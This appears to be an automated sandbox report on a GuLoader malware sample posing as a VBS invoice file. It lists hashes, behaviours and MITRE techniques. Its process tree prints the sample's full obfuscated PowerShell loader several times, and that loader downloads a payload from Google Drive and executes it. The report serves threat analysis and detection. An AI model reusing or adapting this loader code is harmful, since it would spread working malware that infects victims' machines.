guloader | 8eb08f80b960b9400dec60b4868b671c11d55dc217eca76ce34e7627501bc790

General

Target

faktura_6240384907·pdf.vbs
Size

33KB
MD5

23a871278b8175dff3c51ea64e258d87
SHA1

099366ae409ea0908fbb3facf931028289e48e78
SHA256

a860af9a977d8fc6ad99942d066df0d8ca618c449eb3a3190fc3d49d6755ef17
SHA512

ce7ebf6cb316057556ebaf77de487985ee566fae67a788db6351b091c43a0af5cdab34bde1c8e242ce81c971b39f83c8bcb98d8fe02a12f36e1b14ddfa80e8e9
SSDEEP

384:3k7jqtTDo8r1VebE3KUOOpJWUvZil1pFz:U7mTU8ribNoQUvA1ph

Score

10^/10

guloader discovery downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	3900	WScript.exe
13	2272	powershell.exe
15	2272	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
12	drive.google.com
13	drive.google.com
24	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3112	wabmig.exe
3112	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1504	powershell.exe
3112	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1504 set thread context of 3112	1504	powershell.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2272	powershell.exe
2272	powershell.exe
1504	powershell.exe
1504	powershell.exe
1504	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1504	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3112	wabmig.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3900 wrote to memory of 2272	3900	WScript.exe	82
PID 3900 wrote to memory of 2272	3900	WScript.exe	82
PID 2272 wrote to memory of 4948	2272	powershell.exe	84
PID 2272 wrote to memory of 4948	2272	powershell.exe	84
PID 2272 wrote to memory of 3800	2272	powershell.exe	90
PID 2272 wrote to memory of 3800	2272	powershell.exe	90
PID 3800 wrote to memory of 1504	3800	cmd.exe	91
PID 3800 wrote to memory of 1504	3800	cmd.exe	91
PID 3800 wrote to memory of 1504	3800	cmd.exe	91
PID 1504 wrote to memory of 4380	1504	powershell.exe	94
PID 1504 wrote to memory of 4380	1504	powershell.exe	94
PID 1504 wrote to memory of 4380	1504	powershell.exe	94
PID 1504 wrote to memory of 3112	1504	powershell.exe	95
PID 1504 wrote to memory of 3112	1504	powershell.exe	95
PID 1504 wrote to memory of 3112	1504	powershell.exe	95
PID 1504 wrote to memory of 3112	1504	powershell.exe	95
PID 1504 wrote to memory of 3112	1504	powershell.exe	95

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\faktura_6240384907·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Signiory Glammene caprylene #>;$Pligtforsmmelse='acoemeti';<#Epigraphic freyas dartboard Radiogoniometry gudfaren #>;$Kuku=$host.PrivateData;If ($Kuku) {$Vrdimngders++;}function Traverseringer($Enwinding){$Atlantens=$Enwinding.Length-$Vrdimngders;for( $Nabosegmenterne=5;$Nabosegmenterne -lt $Atlantens;$Nabosegmenterne+=6){$Corneule+=$Enwinding[$Nabosegmenterne];}$Corneule;}function Preapproval184($Cantare){ . ($Terribility) ($Cantare);}$Gambas=Traverseringer ',tdtrM Tu,eoKaffezMatrii T uglA stalAndeba nde/Stjra5R dod.Sli,b0Termi scopu( L.stWBuzzgiAnmelnSpe mdH lvaoStraawUnubis Kran RoueNKa,veTEtp,r Stamp1Revis0Hepat.Arche0Un,er; nop NedstWM,talieucomnFinan6Kolos4Fedtl; rum Ped.mxs,eto6Ejend4Eidou;Moral GlanerUngkovPrste:Micro1Rando2Bagep1 orst.i com0 rni)U.jui FoetoGFr.rgeGyno cGappik BaegoPro.o/M.scu2Pe ic0Opnaa1St.ne0 Mi d0 retr1Bille0 Udsa1Dee k repaF KvaliRegn.rBrod.eToo mfGranaoTilk.xFors /.hron1 ovis2 liv1Masse.poste0Deplo ';$Sarandon=Traverseringer 'Sja,kuPdagosYago E Tra.rAiger-Pans ACospoGdomydeFootwnkarantTirag ';$Helbredelser=Traverseringer 'UmulihExclutKvls,tBrystp Stans Refl:Intra/Naale/Savagd,epharStolaiDefecvA.ysseLarde.Hackmg FlokoKukeroFode gIldral Ke ie Cap .Sprudc cardoArbejmBagsd/Her.aumedarc F lk?afskae RecoxO ittpSub,aogas rrKystbt Eggs= PyntdRes.eoFestiwKorponRs nolEm eoo omopafurtidCloac&Ta eriT.udddTj,es=subsu1Relakw Ve dJ undZNedadu ,rinqTrans3Fni tVSpis.5princLSkolecSanemx Leuc3LivsnGBoghoEShrilI S.elECa raJ RestFLydteSC strRStrika igiHA skuXHolotzLitig_ nvoymVveskLOnaggGPandeL sudaX LandN ovedTHapl, ';$Bnkebideren=Traverseringer 'Marsk>Ti.pi ';$Terribility=Traverseringer 'omka I TrveEBe.egxOxalu ';$Predecessor='Floraerne';$leto = Traverseringer 'Intore justc Asy,hErklroUnder tidsr%Haan aThreppPl stpGe kodEch,naUningtTobogaRotun%Methe\Ele tFFidacaBesinvEgbohn EpheeFullm.L aneFOpfinoCe.rir Shop Ridse&Micro&Raffi S,nseeKu tuc CreahYtrinoUaktu RolletBadan ';Preapproval184 (Traverseringer 'Anven$ SkydgTer slKon eoKalibbInt gaprofulMaski:Is laSSa,onk Noisu Kai,mIlluslNonl.sTrephn Tri.iFerfen Sumpg Blooe ogtin.ysershirdm=Skra (Tractc T apmLgge.dT.mpo Gouti/M ppecEpicl Car e$Rhe.ul ConveEditot Eu.aoKolle) Rote ');Preapproval184 (Traverseringer ' Trkk$ EndogGri,mlVirgioSk,lsbFrkenaEhrlil tele:BabeiBStje.r CyandGuyspfOps idSk.bs=Dr ft$SknkeHElecte Maril .uadbPaatarPrepee MoundHvi leAftralChacosFlsomeOevelr Agis.DiaursTestpp KapilTune iSh,ewtut,ne( Dige$Unre.B.niplnRepark egore ipunbUnderiTo nadHyoide Realr RegneAutovn F,nk)Frisk ');Preapproval184 (Traverseringer 'Agris[Ca noNEm.tieVetert gnos.SkydeSSteateErkl,rGravivK,eosi Syd cFor,seFolkePVrdi,o .rodi Ex rnMyxogtHelleMUdganaPro,rnEl.ktaP acig,ndere FalcrPapma] Fine:Chemo:kittlSB stleSme.tcPaneluSkmtsr JelliUnhootSuperyrentePBrandr Resbodec at SamloUdmarcKnokloFannelexocu messm=Lsni, Tritu[Phoe.N kulpe.iscotGevir.FlambSGirdleX nogcDesuluSob.rrSkr viAs est unpiyHeterP jungrD magoTillbt BriaoIlle ctaxafoPistolHoreuTRolliyImdekpTrutheSk ma] Warp:rej e:reeveT LyselSvinksAabn,1Antil2Udsla ');$Helbredelser=$Brdfd[0];$Molewarp= (Traverseringer ' ires$Fie dGUnp eLUstoroUds eBCoeloaSatanLtatte:CompuF PaeaIMystesAppliHRechaW ,amii llovava aEMa npS upul= DrognCalciENa anwSuper-dvlesO kvalBFurn.j MortE remtc Nonctflyve AccisMa,erYSwathSPl ght rusteDisenM arbi.TaabeNSandheIgangTan ri.Lakr,W BeaaeverstBJereeC vikklPi kwiTiffaEStrmeNEle.tt');$Molewarp+=$Skumlsningens[1];Preapproval184 ($Molewarp);Preapproval184 (Traverseringer 'Tegne$ SuprFAnodoiIndstsHilsahBesaewViaduiArntsv Utake C njsDyng .M altHI,tere BredaoveredLupuleAstylr,ihils bjur[Bened$smeltS So aaNaphtrVidneaPublinDunbid isoroJ,nksnAcedi]Men.e=preun$ PietG SweeaKirkemBrndebPubl.aFrostsSkdes ');$Foragtens=Traverseringer ' ingb$SirikF Mo piManqusPralehInforwSuperi Pri.vUdlsneAgerlsTrien.SeddeDCountoSynsrw SournGrnselR sysoChro aPredadTwofoFTvangiin umlParameDehum( Citi$ UdbrHChafeeWalk l Ap,mb antarPr gre Absod progeSit rl Bands Cuirewitacr men,Paate$SyndiK Fo nvIncu,iYear vEmbosachevalQ,alieBe srnExhibtdeeneeVacatr agte) Krit ';$Kvivalenter=$Skumlsningens[0];Preapproval184 (Traverseringer 'Imdek$ Glasg LnrelSq.aloAn egb RollAYe saL Cade: Re rB pilIL.steMAchelIRegneNfiskeiSou.d=godke(Al.alTAndroEAfspnsPluritPa io-Conspp ,altARskenT TresHArgle Fle $SpadeKMelboVFaksiIOthe.v dsknaVej alDrenge ArbeNDocklTInchaeBrug,r Unfo)Trila ');while (!$Bimini) {Preapproval184 (Traverseringer 'olymp$MarblgZakmilInfraoUbef bVieweaSammelUnani: AllesLseprvSpattrKurseiTra,snBo ncd ka tuBreccs OrdstSherarDatakiPolop=Orkan$ ResptRockerBas,luShau.e Detm ') ;Preapproval184 $Foragtens;Preapproval184 (Traverseringer 'ErgotSBobletDesigaDuplir andst Subc-UvsenS iberlaviseeAllereNeuropDicep High 4Waxil ');Preapproval184 (Traverseringer 'Tildr$A,tergHavkalHermioEs ribba raaBlo tlBlakk: Sva,B HenniAstermTrinoiLavisnEngagi Rubi=Topal(Gri,fTRe neeTwifosNeotrtElsiz- ParaPArkanaCar it kuffhImpas Gran$ O skKVerifvBosc iSammevPluriaMedstl R,tieDamsen BiogtU.vale ArberNe co)Zymes ') ;Preapproval184 (Traverseringer 'Speak$RundhgSundhlStatioIn.utbst.lda An,el Indb:TyphoSInvesa Paasp Skra=Achil$Demo gdu nel Gra,o ska bAn tia feltl Mul.: arsoE Tegln FlowtNy ageHanderI effoCong,lLimbiiAevumtunderhTact.i orbaa .uirsHyperiUnequsOver +Bikag+ Sw,n%Reave$ rejnBMikror kftedOutbufPo ntd trll.UafvicK.gedosilviuAutornKa.iat Redb ') ;$Helbredelser=$Brdfd[$Sap];}$Effluent=328183;$Tilendebringende141=30662;Preapproval184 (Traverseringer 'Kisse$In urgInfi lReroyoS ranbAer sa A.telUnree:AndroUIdentdObtaivBrackitiltakPosi lFel fiImdekn S orgCholesPennaoUrsicmMill.kWhi woNedsksRinaltspanknAblatiTildenIngelgCannoeFattirFj re Coryl= aand AotesGAcroge expltR bbl- rillCforfaoRe imn Sys tBilleeUntarnTthedtforva ,rter$Vict.KHushovChintiSyendvDesubaColoul ExceeZym ln IntetGesxeeCentrr Vold ');Preapproval184 (Traverseringer 'Nonar$UtydegteleflSaltko HellbCons a Actal lbes: uforAAnalymyd.eltRidessCoriogMateraatr crR turaInst n Str.tBes ti Mano Haabe=Brier Krymm[measuSWo anyshifts ud,tt Opsae ,imimUltra.LianeCSaddloUbesknIndenv Aftee RaasrAchrotHamal]Regne:H ael:St,idF ingarOctupoBrnd,mButtoBExaggaCu drsRealie kort6Nonst4ForpaSRetspt.ardirAngreiAktien Hal gPic i( pr e$NotedU,krvldStrokvFiskei dssyk etall,ubliiAflusnprejugGolfes WhipoEmp,rmIm.erkredouoTyskesDismatRecoin DipliByggenHyphog HjlpeHaa drSlagt)Matut ');Preapproval184 (Traverseringer 'Stemm$FuglegReflel ouchop ismbreduxa Mylolvrkst:GraftK DioprUnderaMaranbTyvennForudiNaadlnArdufg,rila Ruina=Roets Newfo[ Fil,SFredyydeputsLindstSnorkeFdselmGraes.cooinT ,onne In exTunnetAmar,.DelegE EparnValuec DysfoUnfaddSuperiAfhudnFastlgOptim]temp.: Delt:Phy,oA,uttuSAllegC recrIOvercI adel.FoderGUnisteShellt trimSDest tFrkenrFatteiScle,nHeroigLuann(Afmar$Un ppAExpedm SkrktH,pnosSignagB nebaBianirE thra Afren UnextTi.loiL apf)icono ');Preapproval184 (Traverseringer 'Be ys$ Kil gIntenl Sub oVartebFarefasynstl Inst:RialtSfangskTail rTendeu omnieju tar Laci=Hoved$TessuKA grurPhoreaBoultbAerognUnderi AnarnShoolgCcid . alors sakruAtombbPristsTr pet SemirBlgedica.ulnForbrgHomer( Line$RoyceESvrdffRobo fDj ell SticuEuo meWositn KructAs.or,Slags$TjernTIonisiReadvl AegaeOvervn ,oetdOuttyeOpre.bTilvkr askihochhn LiqugSdssueintron Sk.ldUnbleehftn 1E.skl4 Ophi1dosim)Flage ');Preapproval184 $Skruer;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Favne.For && echo t"
    3⤵
    PID:4948
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Signiory Glammene caprylene #>;$Pligtforsmmelse='acoemeti';<#Epigraphic freyas dartboard Radiogoniometry gudfaren #>;$Kuku=$host.PrivateData;If ($Kuku) {$Vrdimngders++;}function Traverseringer($Enwinding){$Atlantens=$Enwinding.Length-$Vrdimngders;for( $Nabosegmenterne=5;$Nabosegmenterne -lt $Atlantens;$Nabosegmenterne+=6){$Corneule+=$Enwinding[$Nabosegmenterne];}$Corneule;}function Preapproval184($Cantare){ . ($Terribility) ($Cantare);}$Gambas=Traverseringer ',tdtrM Tu,eoKaffezMatrii T uglA stalAndeba nde/Stjra5R dod.Sli,b0Termi scopu( L.stWBuzzgiAnmelnSpe mdH lvaoStraawUnubis Kran RoueNKa,veTEtp,r Stamp1Revis0Hepat.Arche0Un,er; nop NedstWM,talieucomnFinan6Kolos4Fedtl; rum Ped.mxs,eto6Ejend4Eidou;Moral GlanerUngkovPrste:Micro1Rando2Bagep1 orst.i com0 rni)U.jui FoetoGFr.rgeGyno cGappik BaegoPro.o/M.scu2Pe ic0Opnaa1St.ne0 Mi d0 retr1Bille0 Udsa1Dee k repaF KvaliRegn.rBrod.eToo mfGranaoTilk.xFors /.hron1 ovis2 liv1Masse.poste0Deplo ';$Sarandon=Traverseringer 'Sja,kuPdagosYago E Tra.rAiger-Pans ACospoGdomydeFootwnkarantTirag ';$Helbredelser=Traverseringer 'UmulihExclutKvls,tBrystp Stans Refl:Intra/Naale/Savagd,epharStolaiDefecvA.ysseLarde.Hackmg FlokoKukeroFode gIldral Ke ie Cap .Sprudc cardoArbejmBagsd/Her.aumedarc F lk?afskae RecoxO ittpSub,aogas rrKystbt Eggs= PyntdRes.eoFestiwKorponRs nolEm eoo omopafurtidCloac&Ta eriT.udddTj,es=subsu1Relakw Ve dJ undZNedadu ,rinqTrans3Fni tVSpis.5princLSkolecSanemx Leuc3LivsnGBoghoEShrilI S.elECa raJ RestFLydteSC strRStrika igiHA skuXHolotzLitig_ nvoymVveskLOnaggGPandeL sudaX LandN ovedTHapl, ';$Bnkebideren=Traverseringer 'Marsk>Ti.pi ';$Terribility=Traverseringer 'omka I TrveEBe.egxOxalu ';$Predecessor='Floraerne';$leto = Traverseringer 'Intore justc Asy,hErklroUnder tidsr%Haan aThreppPl stpGe kodEch,naUningtTobogaRotun%Methe\Ele tFFidacaBesinvEgbohn EpheeFullm.L aneFOpfinoCe.rir Shop Ridse&Micro&Raffi S,nseeKu tuc CreahYtrinoUaktu RolletBadan ';Preapproval184 (Traverseringer 'Anven$ SkydgTer slKon eoKalibbInt gaprofulMaski:Is laSSa,onk Noisu Kai,mIlluslNonl.sTrephn Tri.iFerfen Sumpg Blooe ogtin.ysershirdm=Skra (Tractc T apmLgge.dT.mpo Gouti/M ppecEpicl Car e$Rhe.ul ConveEditot Eu.aoKolle) Rote ');Preapproval184 (Traverseringer ' Trkk$ EndogGri,mlVirgioSk,lsbFrkenaEhrlil tele:BabeiBStje.r CyandGuyspfOps idSk.bs=Dr ft$SknkeHElecte Maril .uadbPaatarPrepee MoundHvi leAftralChacosFlsomeOevelr Agis.DiaursTestpp KapilTune iSh,ewtut,ne( Dige$Unre.B.niplnRepark egore ipunbUnderiTo nadHyoide Realr RegneAutovn F,nk)Frisk ');Preapproval184 (Traverseringer 'Agris[Ca noNEm.tieVetert gnos.SkydeSSteateErkl,rGravivK,eosi Syd cFor,seFolkePVrdi,o .rodi Ex rnMyxogtHelleMUdganaPro,rnEl.ktaP acig,ndere FalcrPapma] Fine:Chemo:kittlSB stleSme.tcPaneluSkmtsr JelliUnhootSuperyrentePBrandr Resbodec at SamloUdmarcKnokloFannelexocu messm=Lsni, Tritu[Phoe.N kulpe.iscotGevir.FlambSGirdleX nogcDesuluSob.rrSkr viAs est unpiyHeterP jungrD magoTillbt BriaoIlle ctaxafoPistolHoreuTRolliyImdekpTrutheSk ma] Warp:rej e:reeveT LyselSvinksAabn,1Antil2Udsla ');$Helbredelser=$Brdfd[0];$Molewarp= (Traverseringer ' ires$Fie dGUnp eLUstoroUds eBCoeloaSatanLtatte:CompuF PaeaIMystesAppliHRechaW ,amii llovava aEMa npS upul= DrognCalciENa anwSuper-dvlesO kvalBFurn.j MortE remtc Nonctflyve AccisMa,erYSwathSPl ght rusteDisenM arbi.TaabeNSandheIgangTan ri.Lakr,W BeaaeverstBJereeC vikklPi kwiTiffaEStrmeNEle.tt');$Molewarp+=$Skumlsningens[1];Preapproval184 ($Molewarp);Preapproval184 (Traverseringer 'Tegne$ SuprFAnodoiIndstsHilsahBesaewViaduiArntsv Utake C njsDyng .M altHI,tere BredaoveredLupuleAstylr,ihils bjur[Bened$smeltS So aaNaphtrVidneaPublinDunbid isoroJ,nksnAcedi]Men.e=preun$ PietG SweeaKirkemBrndebPubl.aFrostsSkdes ');$Foragtens=Traverseringer ' ingb$SirikF Mo piManqusPralehInforwSuperi Pri.vUdlsneAgerlsTrien.SeddeDCountoSynsrw SournGrnselR sysoChro aPredadTwofoFTvangiin umlParameDehum( Citi$ UdbrHChafeeWalk l Ap,mb antarPr gre Absod progeSit rl Bands Cuirewitacr men,Paate$SyndiK Fo nvIncu,iYear vEmbosachevalQ,alieBe srnExhibtdeeneeVacatr agte) Krit ';$Kvivalenter=$Skumlsningens[0];Preapproval184 (Traverseringer 'Imdek$ Glasg LnrelSq.aloAn egb RollAYe saL Cade: Re rB pilIL.steMAchelIRegneNfiskeiSou.d=godke(Al.alTAndroEAfspnsPluritPa io-Conspp ,altARskenT TresHArgle Fle $SpadeKMelboVFaksiIOthe.v dsknaVej alDrenge ArbeNDocklTInchaeBrug,r Unfo)Trila ');while (!$Bimini) {Preapproval184 (Traverseringer 'olymp$MarblgZakmilInfraoUbef bVieweaSammelUnani: AllesLseprvSpattrKurseiTra,snBo ncd ka tuBreccs OrdstSherarDatakiPolop=Orkan$ ResptRockerBas,luShau.e Detm ') ;Preapproval184 $Foragtens;Preapproval184 (Traverseringer 'ErgotSBobletDesigaDuplir andst Subc-UvsenS iberlaviseeAllereNeuropDicep High 4Waxil ');Preapproval184 (Traverseringer 'Tildr$A,tergHavkalHermioEs ribba raaBlo tlBlakk: Sva,B HenniAstermTrinoiLavisnEngagi Rubi=Topal(Gri,fTRe neeTwifosNeotrtElsiz- ParaPArkanaCar it kuffhImpas Gran$ O skKVerifvBosc iSammevPluriaMedstl R,tieDamsen BiogtU.vale ArberNe co)Zymes ') ;Preapproval184 (Traverseringer 'Speak$RundhgSundhlStatioIn.utbst.lda An,el Indb:TyphoSInvesa Paasp Skra=Achil$Demo gdu nel Gra,o ska bAn tia feltl Mul.: arsoE Tegln FlowtNy ageHanderI effoCong,lLimbiiAevumtunderhTact.i orbaa .uirsHyperiUnequsOver +Bikag+ Sw,n%Reave$ rejnBMikror kftedOutbufPo ntd trll.UafvicK.gedosilviuAutornKa.iat Redb ') ;$Helbredelser=$Brdfd[$Sap];}$Effluent=328183;$Tilendebringende141=30662;Preapproval184 (Traverseringer 'Kisse$In urgInfi lReroyoS ranbAer sa A.telUnree:AndroUIdentdObtaivBrackitiltakPosi lFel fiImdekn S orgCholesPennaoUrsicmMill.kWhi woNedsksRinaltspanknAblatiTildenIngelgCannoeFattirFj re Coryl= aand AotesGAcroge expltR bbl- rillCforfaoRe imn Sys tBilleeUntarnTthedtforva ,rter$Vict.KHushovChintiSyendvDesubaColoul ExceeZym ln IntetGesxeeCentrr Vold ');Preapproval184 (Traverseringer 'Nonar$UtydegteleflSaltko HellbCons a Actal lbes: uforAAnalymyd.eltRidessCoriogMateraatr crR turaInst n Str.tBes ti Mano Haabe=Brier Krymm[measuSWo anyshifts ud,tt Opsae ,imimUltra.LianeCSaddloUbesknIndenv Aftee RaasrAchrotHamal]Regne:H ael:St,idF ingarOctupoBrnd,mButtoBExaggaCu drsRealie kort6Nonst4ForpaSRetspt.ardirAngreiAktien Hal gPic i( pr e$NotedU,krvldStrokvFiskei dssyk etall,ubliiAflusnprejugGolfes WhipoEmp,rmIm.erkredouoTyskesDismatRecoin DipliByggenHyphog HjlpeHaa drSlagt)Matut ');Preapproval184 (Traverseringer 'Stemm$FuglegReflel ouchop ismbreduxa Mylolvrkst:GraftK DioprUnderaMaranbTyvennForudiNaadlnArdufg,rila Ruina=Roets Newfo[ Fil,SFredyydeputsLindstSnorkeFdselmGraes.cooinT ,onne In exTunnetAmar,.DelegE EparnValuec DysfoUnfaddSuperiAfhudnFastlgOptim]temp.: Delt:Phy,oA,uttuSAllegC recrIOvercI adel.FoderGUnisteShellt trimSDest tFrkenrFatteiScle,nHeroigLuann(Afmar$Un ppAExpedm SkrktH,pnosSignagB nebaBianirE thra Afren UnextTi.loiL apf)icono ');Preapproval184 (Traverseringer 'Be ys$ Kil gIntenl Sub oVartebFarefasynstl Inst:RialtSfangskTail rTendeu omnieju tar Laci=Hoved$TessuKA grurPhoreaBoultbAerognUnderi AnarnShoolgCcid . alors sakruAtombbPristsTr pet SemirBlgedica.ulnForbrgHomer( Line$RoyceESvrdffRobo fDj ell SticuEuo meWositn KructAs.or,Slags$TjernTIonisiReadvl AegaeOvervn ,oetdOuttyeOpre.bTilvkr askihochhn LiqugSdssueintron Sk.ldUnbleehftn 1E.skl4 Ophi1dosim)Flage ');Preapproval184 $Skruer;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Signiory Glammene caprylene #>;$Pligtforsmmelse='acoemeti';<#Epigraphic freyas dartboard Radiogoniometry gudfaren #>;$Kuku=$host.PrivateData;If ($Kuku) {$Vrdimngders++;}function Traverseringer($Enwinding){$Atlantens=$Enwinding.Length-$Vrdimngders;for( $Nabosegmenterne=5;$Nabosegmenterne -lt $Atlantens;$Nabosegmenterne+=6){$Corneule+=$Enwinding[$Nabosegmenterne];}$Corneule;}function Preapproval184($Cantare){ . ($Terribility) ($Cantare);}$Gambas=Traverseringer ',tdtrM Tu,eoKaffezMatrii T uglA stalAndeba nde/Stjra5R dod.Sli,b0Termi scopu( L.stWBuzzgiAnmelnSpe mdH lvaoStraawUnubis Kran RoueNKa,veTEtp,r Stamp1Revis0Hepat.Arche0Un,er; nop NedstWM,talieucomnFinan6Kolos4Fedtl; rum Ped.mxs,eto6Ejend4Eidou;Moral GlanerUngkovPrste:Micro1Rando2Bagep1 orst.i com0 rni)U.jui FoetoGFr.rgeGyno cGappik BaegoPro.o/M.scu2Pe ic0Opnaa1St.ne0 Mi d0 retr1Bille0 Udsa1Dee k repaF KvaliRegn.rBrod.eToo mfGranaoTilk.xFors /.hron1 ovis2 liv1Masse.poste0Deplo ';$Sarandon=Traverseringer 'Sja,kuPdagosYago E Tra.rAiger-Pans ACospoGdomydeFootwnkarantTirag ';$Helbredelser=Traverseringer 'UmulihExclutKvls,tBrystp Stans Refl:Intra/Naale/Savagd,epharStolaiDefecvA.ysseLarde.Hackmg FlokoKukeroFode gIldral Ke ie Cap .Sprudc cardoArbejmBagsd/Her.aumedarc F lk?afskae RecoxO ittpSub,aogas rrKystbt Eggs= PyntdRes.eoFestiwKorponRs nolEm eoo omopafurtidCloac&Ta eriT.udddTj,es=subsu1Relakw Ve dJ undZNedadu ,rinqTrans3Fni tVSpis.5princLSkolecSanemx Leuc3LivsnGBoghoEShrilI S.elECa raJ RestFLydteSC strRStrika igiHA skuXHolotzLitig_ nvoymVveskLOnaggGPandeL sudaX LandN ovedTHapl, ';$Bnkebideren=Traverseringer 'Marsk>Ti.pi ';$Terribility=Traverseringer 'omka I TrveEBe.egxOxalu ';$Predecessor='Floraerne';$leto = Traverseringer 'Intore justc Asy,hErklroUnder tidsr%Haan aThreppPl stpGe kodEch,naUningtTobogaRotun%Methe\Ele tFFidacaBesinvEgbohn EpheeFullm.L aneFOpfinoCe.rir Shop Ridse&Micro&Raffi S,nseeKu tuc CreahYtrinoUaktu RolletBadan ';Preapproval184 (Traverseringer 'Anven$ SkydgTer slKon eoKalibbInt gaprofulMaski:Is laSSa,onk Noisu Kai,mIlluslNonl.sTrephn Tri.iFerfen Sumpg Blooe ogtin.ysershirdm=Skra (Tractc T apmLgge.dT.mpo Gouti/M ppecEpicl Car e$Rhe.ul ConveEditot Eu.aoKolle) Rote ');Preapproval184 (Traverseringer ' Trkk$ EndogGri,mlVirgioSk,lsbFrkenaEhrlil tele:BabeiBStje.r CyandGuyspfOps idSk.bs=Dr ft$SknkeHElecte Maril .uadbPaatarPrepee MoundHvi leAftralChacosFlsomeOevelr Agis.DiaursTestpp KapilTune iSh,ewtut,ne( Dige$Unre.B.niplnRepark egore ipunbUnderiTo nadHyoide Realr RegneAutovn F,nk)Frisk ');Preapproval184 (Traverseringer 'Agris[Ca noNEm.tieVetert gnos.SkydeSSteateErkl,rGravivK,eosi Syd cFor,seFolkePVrdi,o .rodi Ex rnMyxogtHelleMUdganaPro,rnEl.ktaP acig,ndere FalcrPapma] Fine:Chemo:kittlSB stleSme.tcPaneluSkmtsr JelliUnhootSuperyrentePBrandr Resbodec at SamloUdmarcKnokloFannelexocu messm=Lsni, Tritu[Phoe.N kulpe.iscotGevir.FlambSGirdleX nogcDesuluSob.rrSkr viAs est unpiyHeterP jungrD magoTillbt BriaoIlle ctaxafoPistolHoreuTRolliyImdekpTrutheSk ma] Warp:rej e:reeveT LyselSvinksAabn,1Antil2Udsla ');$Helbredelser=$Brdfd[0];$Molewarp= (Traverseringer ' ires$Fie dGUnp eLUstoroUds eBCoeloaSatanLtatte:CompuF PaeaIMystesAppliHRechaW ,amii llovava aEMa npS upul= DrognCalciENa anwSuper-dvlesO kvalBFurn.j MortE remtc Nonctflyve AccisMa,erYSwathSPl ght rusteDisenM arbi.TaabeNSandheIgangTan ri.Lakr,W BeaaeverstBJereeC vikklPi kwiTiffaEStrmeNEle.tt');$Molewarp+=$Skumlsningens[1];Preapproval184 ($Molewarp);Preapproval184 (Traverseringer 'Tegne$ SuprFAnodoiIndstsHilsahBesaewViaduiArntsv Utake C njsDyng .M altHI,tere BredaoveredLupuleAstylr,ihils bjur[Bened$smeltS So aaNaphtrVidneaPublinDunbid isoroJ,nksnAcedi]Men.e=preun$ PietG SweeaKirkemBrndebPubl.aFrostsSkdes ');$Foragtens=Traverseringer ' ingb$SirikF Mo piManqusPralehInforwSuperi Pri.vUdlsneAgerlsTrien.SeddeDCountoSynsrw SournGrnselR sysoChro aPredadTwofoFTvangiin umlParameDehum( Citi$ UdbrHChafeeWalk l Ap,mb antarPr gre Absod progeSit rl Bands Cuirewitacr men,Paate$SyndiK Fo nvIncu,iYear vEmbosachevalQ,alieBe srnExhibtdeeneeVacatr agte) Krit ';$Kvivalenter=$Skumlsningens[0];Preapproval184 (Traverseringer 'Imdek$ Glasg LnrelSq.aloAn egb RollAYe saL Cade: Re rB pilIL.steMAchelIRegneNfiskeiSou.d=godke(Al.alTAndroEAfspnsPluritPa io-Conspp ,altARskenT TresHArgle Fle $SpadeKMelboVFaksiIOthe.v dsknaVej alDrenge ArbeNDocklTInchaeBrug,r Unfo)Trila ');while (!$Bimini) {Preapproval184 (Traverseringer 'olymp$MarblgZakmilInfraoUbef bVieweaSammelUnani: AllesLseprvSpattrKurseiTra,snBo ncd ka tuBreccs OrdstSherarDatakiPolop=Orkan$ ResptRockerBas,luShau.e Detm ') ;Preapproval184 $Foragtens;Preapproval184 (Traverseringer 'ErgotSBobletDesigaDuplir andst Subc-UvsenS iberlaviseeAllereNeuropDicep High 4Waxil ');Preapproval184 (Traverseringer 'Tildr$A,tergHavkalHermioEs ribba raaBlo tlBlakk: Sva,B HenniAstermTrinoiLavisnEngagi Rubi=Topal(Gri,fTRe neeTwifosNeotrtElsiz- ParaPArkanaCar it kuffhImpas Gran$ O skKVerifvBosc 